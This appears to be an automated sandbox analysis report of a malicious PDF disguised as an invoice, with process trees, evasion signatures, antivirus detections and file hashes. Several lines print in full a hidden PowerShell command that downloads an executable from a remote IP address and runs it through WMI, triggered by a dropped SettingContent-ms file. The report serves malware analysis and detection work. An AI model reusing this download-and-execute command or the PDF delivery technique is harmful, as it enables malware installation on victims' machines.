Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\scmwrap.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180 | Thread sleep count: 50 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2136 | Thread sleep time: -922337203685477s >= -60000s
Queries keyboard layouts
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409 (2x)
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\scmwrap.exe | System information queried: KernelDebuggerInformation
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\scmwrap.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Windows\System32\scmwrap.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null)
May try to detect the Windows Explorer process (often used for injection)
Source: AcroRd32.exe, 00000003.00000002.10732133301.01410000.00000002.sdmp | Binary or memory string: Progman
Source: AcroRd32.exe, 00000003.00000002.10732133301.01410000.00000002.sdmp | Binary or memory string: Program Manager
Source: AcroRd32.exe, 00000003.00000002.10732133301.01410000.00000002.sdmp | Binary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\scmwrap.exe | Queries volume information: C:\Windows\System32\scmwrap.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation (2x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2x)
Queries the cryptographic machine GUID
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the internet feature controls of the internet explorer
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe | Registry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION

Behavior Graph

Behavior Graph ID: 618812 | Sample: inovoice-019338.pdf | Startdate: 26/07/2018 | Architecture: WINDOWS | Score: 84

Signatures on the submitted sample:
  • Antivirus detection for submitted file
  • Multi AV Scanner detection for submitted file
  • PDF contains an OpenAction to launch a SettingContent-ms file
  • 3 other signatures

Process and network flow recovered from the graph:
  • AcroRd32.exe started
    • AcroRd32.exe started
  • AcroRd32.exe started
    • DNS/IP: files-weighted.r53.acrobat.com 35.168.158.221, port 443 (local port 49188), AMAZON-AES-AmazoncomIncUS, United States
    • Document exploit detected (creates forbidden files)
    • Document exploit detected (process start blacklist hit)
    • AcroRd32.exe started
      • Dropped: C:\Users\user\...\downl.SettingContent-ms, XML
    • scmwrap.exe started
      • cmd.exe started
        • DNS/IP: 169.239.129.117 ZAPPIE-HOST-ASZappieHostGB, Seychelles
        • Suspicious powershell command line found
        • Tries to download and execute files (via powershell)
        • powershell.exe started

Simulations

Behavior and APIs

Time | Type | Description
11:20:23 | API Interceptor | 6x Sleep call for process: AcroRd32.exe modified
11:21:04 | API Interceptor | 6x Sleep call for process: scmwrap.exe modified
11:21:07 | API Interceptor | 1x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label
inovoice-019338.pdf | 54% | virustotal |
inovoice-019338.pdf | 0% | metadefender |
inovoice-019338.pdf | 100% | Avira | HTML/ExpKit.Gen

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
files-weighted.r53.acrobat.com | 0% | virustotal |

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

Match: files-weighted.r53.acrobat.com
  • ReviewDocument.pdf | SHA 256: 56b415919db85bd10ed2f717664c1d670b85cdd8528b652ff7a7445cc25f139f | malicious | Context: 54.88.132.98
  • 6rCb6VW7i.pdf | SHA 256: adab915a279c24a6510a26309db68624456c3eee9c782d98b825e53bacd37476 | malicious | Context: 34.227.146.55

ASN


Dropped Files

No context

Screenshots

Startup

  • System is w7_1
  • AcroRd32.exe (PID: 3816 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 MD5: 513659580A49DF6A85CDFD869895924A)
    • AcroRd32.exe (PID: 3860 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3816.0.959207006 --type=renderer --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a MD5: 513659580A49DF6A85CDFD869895924A)
  • AcroRd32.exe (PID: 3876 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\inovoice-019338.pdf' MD5: 513659580A49DF6A85CDFD869895924A)
    • AcroRd32.exe (PID: 3924 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3876.0.283852601 --type=renderer 'C:\Users\user\Desktop\inovoice-019338.pdf' MD5: 513659580A49DF6A85CDFD869895924A)
    • scmwrap.exe (PID: 2552 cmdline: 'C:\Windows\system32\scmwrap.exe' 'C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms' MD5: 5040C4CA9EE4965AD0BA8DAEE98A1885)
      • cmd.exe (PID: 2068 cmdline: 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null) MD5: AD7B9C14083B52BC532FBA5948342B98)
        • powershell.exe (PID: 2108 cmdline: Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\11.0\ReaderMessages
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:SQLite 3.x database
Size (bytes):2048
Entropy (8bit):5.080677532446519
Encrypted:false
MD5:AF124497B84BBAAF0B65652FD2573D50
SHA1:2B991E721C6C48706CE849DD6C4BBA8577D05FF1
SHA-256:3E17BEE0281AFACF559063B5CF2D529A055EFE7838780F6310A1987B0430324A
SHA-512:8A3BE1928E45AD41D7765709EAB7C092C59EA8219D64BB7FB3BBA3B5588199BC7470B43E498E7D8178098733C448B6BFEC8E3AB507E3A815C1CE0D3934D1640A
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\11.0\ReaderMessages-journal
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):2588
Entropy (8bit):4.1120126635243475
Encrypted:false
MD5:9925D36B2B5A34A580EB02B0476DAB7D
SHA1:80804732D040F201E68C19A19341B727C4C0D5C4
SHA-256:7EFBBCAC37CC0335FC8CA56FD412066C38286D5343C37DD857989473D9DA0E91
SHA-512:C2D005153D64A5B9514D3CF27CDD587C21390063661129D2861F7052BA8E638E68F783E57FD79B5D7BCD753F08547C7F7D88D619F6A3FE39A388815187311389
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Adobe\Acrobat\11.0\AdobeFnt14.lst.3924
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:PostScript document text
Size (bytes):512
Entropy (8bit):5.117198274610967
Encrypted:false
MD5:9009986410F80110B25EBB18F9E235A7
SHA1:9CB5D7773B165F6CDA86E919AD55410FA23CA366
SHA-256:90D017508487D81BB94B2B59F8BC7426C378E91FE8A8B7ABD4A96F19F37E1C04
SHA-512:FE16B85E2389E6BFA60C8C39AB322FEBA6E893454153F77999E883B43F558797088C927BFC62BE05781F76F935F163BDDA3BC9992F3C5246FF34507B72682A21
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Local\Adobe\Acrobat\11.0\Cache\AdobeFnt14.lst.3924
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:PostScript document text
Size (bytes):8244
Entropy (8bit):5.160252507231319
Encrypted:false
MD5:9FBB2D39DC204E0DBDB5C72E4C12A474
SHA1:E5072A7B954D68A136A0699696D4758BF08E6000
SHA-256:6ABE7C5946B7CAC089FDE6F0D6964D9C1B9A973A136599A2B87A72756515E498
